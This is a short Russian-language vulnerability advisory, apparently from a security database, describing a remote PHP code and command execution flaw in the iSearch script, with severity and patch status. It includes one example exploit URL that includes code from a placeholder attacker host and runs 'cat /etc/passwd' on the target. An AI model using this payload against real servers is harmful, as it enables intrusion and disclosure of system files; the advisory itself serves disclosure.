Удаленное выполнение произвольных команд в iSearch

Дата публикации:
04.02.2004
Дата изменения:
17.10.2006
Всего просмотров:
1038
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: iSearch

Описание: Уязвимость обнаружена в iSearch. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Пример:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

URL производителя: http://www.isearchthenet.com/isearch/index.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Vuln: iSearch

или введите имя

CAPTCHA